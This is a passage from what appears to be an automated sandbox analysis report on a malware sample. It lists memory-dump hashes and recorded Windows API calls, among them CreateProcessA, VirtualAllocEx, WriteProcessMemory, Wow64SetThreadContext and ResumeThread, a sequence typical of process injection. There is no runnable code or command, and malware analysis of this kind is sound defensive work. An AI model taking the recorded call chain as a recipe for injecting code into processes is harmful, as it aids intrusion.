                          • Opcode Fuzzy Hash: e8849a89ce69aae6873fdf56867be421ac7749de6d547801d367d5a99d5036de
                          • Instruction Fuzzy Hash: A8F02432F212649FDB94C965EC009EABB39E745350F102439E901EB384D762AC01CBC0
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 963f2aeeb69b5719a3bb26ecf1ab330c826454660f8aa236d2248a8be8d18b9d
                          • Instruction ID: 790c265c8749acad8ed37fe4493747677f3388fa50b5c729411e95dc14cc61f9
                          • Opcode Fuzzy Hash: 963f2aeeb69b5719a3bb26ecf1ab330c826454660f8aa236d2248a8be8d18b9d
                          • Instruction Fuzzy Hash: ADF0A772E202689BDB54D565DC049EABB39F784354F005469E901F7254D7756C00CBC0
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4162479d214560f66573151fe5ebb4ebd7f7d13ace1d582958bf1b2b0f300f1c
                          • Instruction ID: 66c4dd4baa76e75a6a130a203d294ef45af892c7573aec6e3e01fbd700f010a8
                          • Opcode Fuzzy Hash: 4162479d214560f66573151fe5ebb4ebd7f7d13ace1d582958bf1b2b0f300f1c
                          • Instruction Fuzzy Hash: C0E0D8F2E1624CAFDF50CA708A457EA7BBDD742204F1458E5D408CB242F1F6DE518791

                          Execution Graph

                          Execution Coverage:10.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:248
                          Total number of Limit Nodes:12
                          [Execution graph node/edge listing omitted (rendered graph residue). Windows API call nodes recorded in the graph: CallWindowProcW, VirtualProtect, DuplicateHandle, CreateActCtxA, LoadLibraryExW, GetModuleHandleW, DrawTextExW, PostMessageW, ResumeThread, Wow64SetThreadContext, ReadProcessMemory, WriteProcessMemory, CreateProcessA, VirtualAllocEx]

                          Control-flow Graph

                          [Control-flow graph basic-block/edge listing omitted (rendered graph residue, executed/not-executed legend not recoverable). Blocks cover 539b7ad-539bc3d, with one call edge to 539be38.]
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: 89e86715d8b535599f3d5d0978ca00e6cd7347ddbac1aaa3ef6161f92a98fadf
                          • Instruction ID: 29d1912a9195bb960cbb3cc8191a3ac0667da9e67f66751bc8a845e0c4a7a28c
                          • Opcode Fuzzy Hash: 89e86715d8b535599f3d5d0978ca00e6cd7347ddbac1aaa3ef6161f92a98fadf
                          • Instruction Fuzzy Hash: 63E1BEB4D1820ADFDB08CFA5E4958AEFBB6FF88341B148529D415AB354DB349A42CF80

                          Control-flow Graph

                          [Control-flow graph basic-block/edge listing omitted (rendered graph residue, executed/not-executed legend not recoverable). Blocks cover 539b840-539bc3d, with one call edge to 539be38.]
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: c4251a8d350ce53b38f4737a68e280cfad379fd1e00f68fd9f475efd7888ff42
                          • Instruction ID: 5b55c8fc69c3463347a7d71ab44cf0ff01cc5e25b2231dc936d34d67f81ca8d2
                          • Opcode Fuzzy Hash: c4251a8d350ce53b38f4737a68e280cfad379fd1e00f68fd9f475efd7888ff42
                          • Instruction Fuzzy Hash: 6CC15BB0D1820ADFDF08CF95E4958AEFBB6FF88340B10C559D416AB258DB349A42CF94
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: p
                          • API String ID: 0-2181537457
                          • Opcode ID: e237ad6cf8163a108008f663f5a3fcd01b721266e53560d2e276560c84279cc6
                          • Instruction ID: dce40cd23aa6c308984ecc7094aa6576c960765ff5754f7d6bdcf95d81b557ff
                          • Opcode Fuzzy Hash: e237ad6cf8163a108008f663f5a3fcd01b721266e53560d2e276560c84279cc6
                          • Instruction Fuzzy Hash: C45109B0E01318CFEB58CF6AD940B8AFBB7BF89201F04C5A9D408AB215D7309A85CF55
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 494efd90f859b179d8c35cea0866a7610bb2279b844f8fae9c48b52e818d559f
                          • Instruction ID: c56b50dcf217cf471c337a26f7b36e28ed55aa72386fd72131d329fd0c43d9da
                          • Opcode Fuzzy Hash: 494efd90f859b179d8c35cea0866a7610bb2279b844f8fae9c48b52e818d559f
                          • Instruction Fuzzy Hash: DB12D775D1061A8FCB15DF68C884AE9F7B1BF49300F1586AAD859A7211EB70AAC4CF90
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3915d89c81f29c53b50341d3e2fd1cd84b2bfa451aa7f6eb1834c6f044581a7
                          • Instruction ID: c70e7305705f073a9a686963da7e94009242c65562cee51061653b4c9e76d127
                          • Opcode Fuzzy Hash: c3915d89c81f29c53b50341d3e2fd1cd84b2bfa451aa7f6eb1834c6f044581a7
                          • Instruction Fuzzy Hash: E012C875D1071ACFCB15DF68C884AE9F7B1BF49300F1586AAD859A7211EB70AAC4CF90
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd61f6db59a03f51a4453da9cfb937bc9e6f78a0b290b42699a6e37df3cddfed
                          • Instruction ID: 3ea1ff91d0b23f0600519c387232d16dfab85ef930b3947fbbc9f7f391da12f7
                          • Opcode Fuzzy Hash: bd61f6db59a03f51a4453da9cfb937bc9e6f78a0b290b42699a6e37df3cddfed
                          • Instruction Fuzzy Hash: 6691F3B5E14209CFDB08CFA9C885A9EFBF6FF89300F14802AE419AB254DB759945CF54
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8[W$8[W
                          • API String ID: 0-3882825709
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278

                          Control-flow Graph

                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04CB2FDE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0

                          Control-flow Graph

                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04CB2FDE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0

                          Control-flow Graph

                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02A3B3DE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0

                          Control-flow Graph

                          APIs
                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 051E4381
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499212059.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_51e0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: CallProcWindow
                          • String ID:
                          • API String ID: 2714655100-0

                          Control-flow Graph

                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 02A35D59
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0

                          Control-flow Graph

                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 02A35D59
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0

                          Control-flow Graph

                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 052DFCFF
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499454065.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_52d0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 052DFCFF
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499454065.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_52d0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04CB2BB0
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04CB2BB0
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A3D62E,?,?,?,?,?), ref: 02A3D6EF
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04CB25CE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04CB25CE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04CB2C90
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04CB2C90
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A3D62E,?,?,?,?,?), ref: 02A3D6EF
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04CA27B3
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498362413.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4ca0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04CA27B3
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498362413.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4ca0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A3B459,00000800,00000000,00000000), ref: 02A3B66A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: fd4a6740f9f6f19f4625098ef7479fdcd74dcde8666f0f2ec6c0ecee2bba2ca8
                          • Instruction ID: 1bc809023570de6589bcced309ef9da78b6e7e89a28ab01c7a9413347f1f427f
                          • Opcode Fuzzy Hash: fd4a6740f9f6f19f4625098ef7479fdcd74dcde8666f0f2ec6c0ecee2bba2ca8
                          • Instruction Fuzzy Hash: 6A1123B69047498FDB10CF9AD484BDEFBF5EB48314F10882EE519A7600C779A945CFA4
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A3B459,00000800,00000000,00000000), ref: 02A3B66A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 4a1e11108705ae1530b4bd2c2e161843f2b70321da906ff9e52a8173a498904e
                          • Instruction ID: 69316b5b09715091140ffc6a39d938485c361d550664a1ec956cafbd79236ff3
                          • Opcode Fuzzy Hash: 4a1e11108705ae1530b4bd2c2e161843f2b70321da906ff9e52a8173a498904e
                          • Instruction Fuzzy Hash: 491120B6C003098FDB11CFAAD984BDEFBF5AB48314F14882AE419A7600C778A545CFA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 74627518e46d0bb25d117a3c6d157f89f3147952247b618531f42d6a433d41ec
                          • Instruction ID: 9e3c4aa73fa43c5a816e8266e81afd4ae18dc09cf56f0b9844889e0ab1d24f4b
                          • Opcode Fuzzy Hash: 74627518e46d0bb25d117a3c6d157f89f3147952247b618531f42d6a433d41ec
                          • Instruction Fuzzy Hash: 72116AB58003498FDB10DFAAD4457EEFBF5AF48220F24881AC169A7280C779A644CFA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: c776d554def589cbbe1f1f9e03bebe2e9701b09d2e011f2719ceb7f7ac32ea98
                          • Instruction ID: 018443aeede120bf4af40f384522a5ed1f8762b7d209e70636d890408f49201d
                          • Opcode Fuzzy Hash: c776d554def589cbbe1f1f9e03bebe2e9701b09d2e011f2719ceb7f7ac32ea98
                          • Instruction Fuzzy Hash: D4113AB19003498FDB10DFAAC4497EFFBF5EF48214F148419D559A7640C779A544CFA1
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02A3B3DE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: f94326df43d253b68a54bf8b59be278c2debcdf4d6054f2cd0e31a828c2a1d49
                          • Instruction ID: 08b4131fe4728cb9ca72a78dac2b03d9ecd35a294b3756eb096203db3085710d
                          • Opcode Fuzzy Hash: f94326df43d253b68a54bf8b59be278c2debcdf4d6054f2cd0e31a828c2a1d49
                          • Instruction Fuzzy Hash: FB1110B6C006498FDB10CF9AC444BDEFBF5EF88218F10846AD429A7600C379A545CFA1
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04CB648D
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: e8305381c6d804710fe34f989e01858d2e2da2f347e2aaee2f883597d0809d09
                          • Instruction ID: 9d9f526ce6fe8bc893c34173a17d48fd82a2105ec55e10776b159edf9d4ee8ad
                          • Opcode Fuzzy Hash: e8305381c6d804710fe34f989e01858d2e2da2f347e2aaee2f883597d0809d09
                          • Instruction Fuzzy Hash: 971103B59007499FDB10DF9AD485BEEBBF8EB48320F10841AE558A7740D375A944CFA1
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04CB648D
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: c7b75e974ed4e40d44987103456e2ea1f705c9035407beb588d49c1107aec3bd
                          • Instruction ID: 9780572c6b98238481f256c707179403486be6e0bbf1f3c5b60badc728afd37c
                          • Opcode Fuzzy Hash: c7b75e974ed4e40d44987103456e2ea1f705c9035407beb588d49c1107aec3bd
                          • Instruction Fuzzy Hash: 471115B9800349CFDB10CF99D585BDEBBF4FB48310F20841AD558A3640C378A544CFA1
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04CB2ACE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: b5c02a414c1e6f9a6a31fc1e85ae2b163a16cbc0be26f2adfe8408617c9dbbb1
                          • Instruction ID: 39a99990afd4e788f5dd662366b451978ba077e15e9a3bca528687ed5ab72a17
                          • Opcode Fuzzy Hash: b5c02a414c1e6f9a6a31fc1e85ae2b163a16cbc0be26f2adfe8408617c9dbbb1
                          • Instruction Fuzzy Hash: 570135718003499FDB10DFAAC849BEFBFF9EF08314F148419E519A7250C779A540CBA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: fc9b1cb9b518a446c90d3c83c531d03282a77114175ce3d447b04ad62d5b584c
                          • Instruction ID: 81f9938527fd56c3a4e47dde8ac1c1cfd2de1e62eadc1894aba1f79640159d5e
                          • Opcode Fuzzy Hash: fc9b1cb9b518a446c90d3c83c531d03282a77114175ce3d447b04ad62d5b584c
                          • Instruction Fuzzy Hash: 441191F4A0424ACFEF05DFA4D880AECBBBAFB49310F14A215E41ADB349DB709C058B10
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: 15e2c63e9af43f399b0818a168fbfc7c85bd3506b524ca80e9af8041b04b2c80
                          • Instruction ID: 983c6d732d971e27c65b2fb4dfd70f1bfd94e37996e11e7d6d9dfb3356992d90
                          • Opcode Fuzzy Hash: 15e2c63e9af43f399b0818a168fbfc7c85bd3506b524ca80e9af8041b04b2c80
                          • Instruction Fuzzy Hash: A401FFB4A1424ECFEB15DFE4D84469CBBBAFB49310F10A215E51AEF748DB70AC058B50
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: e1248205332be7e28f17d725719638331219847308e81862a8eeaddb5b31643f
                          • Instruction ID: ea9e79ec4ea78377d31596269da434f9df36d86248cde2cf42ca393a88af6a01
                          • Opcode Fuzzy Hash: e1248205332be7e28f17d725719638331219847308e81862a8eeaddb5b31643f
                          • Instruction Fuzzy Hash: B4F019B4A1434A8FEB05DFA4D894A9CBBBAEB49310F109215E91ADF789DA705C05CB40
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: d193e4f8929dff1f932c983b1571eccaa0149188ab0a649cb99f4419ece863a8
                          • Instruction ID: 369b053452a6fcd6af048c611ee76babe13f6b02bef8acbdd67c7fddaa4616d8
                          • Opcode Fuzzy Hash: d193e4f8929dff1f932c983b1571eccaa0149188ab0a649cb99f4419ece863a8
                          • Instruction Fuzzy Hash: 8BE0C27028C259ABDF292BA0E823B727B3EE782701F48802AF28186180CE638410C734
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: 63f9a9556d2637fd547124829a34a954155accfe04f5dd29990fa3a8554a24f3
                          • Instruction ID: 3848942f180eb7573cab9722aab554d2cf9f19c37ac0f804b769dbb3fcb1b7e8
                          • Opcode Fuzzy Hash: 63f9a9556d2637fd547124829a34a954155accfe04f5dd29990fa3a8554a24f3
                          • Instruction Fuzzy Hash: 0FD05B7034931CEFDF6856D1E417B36766EB785701F14801EF54695584DEB28800C735
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05156fc7eaaa9244b7e67e9fcc144c14d72d2dedbcfa184cf4b06bb4bcae9c7c
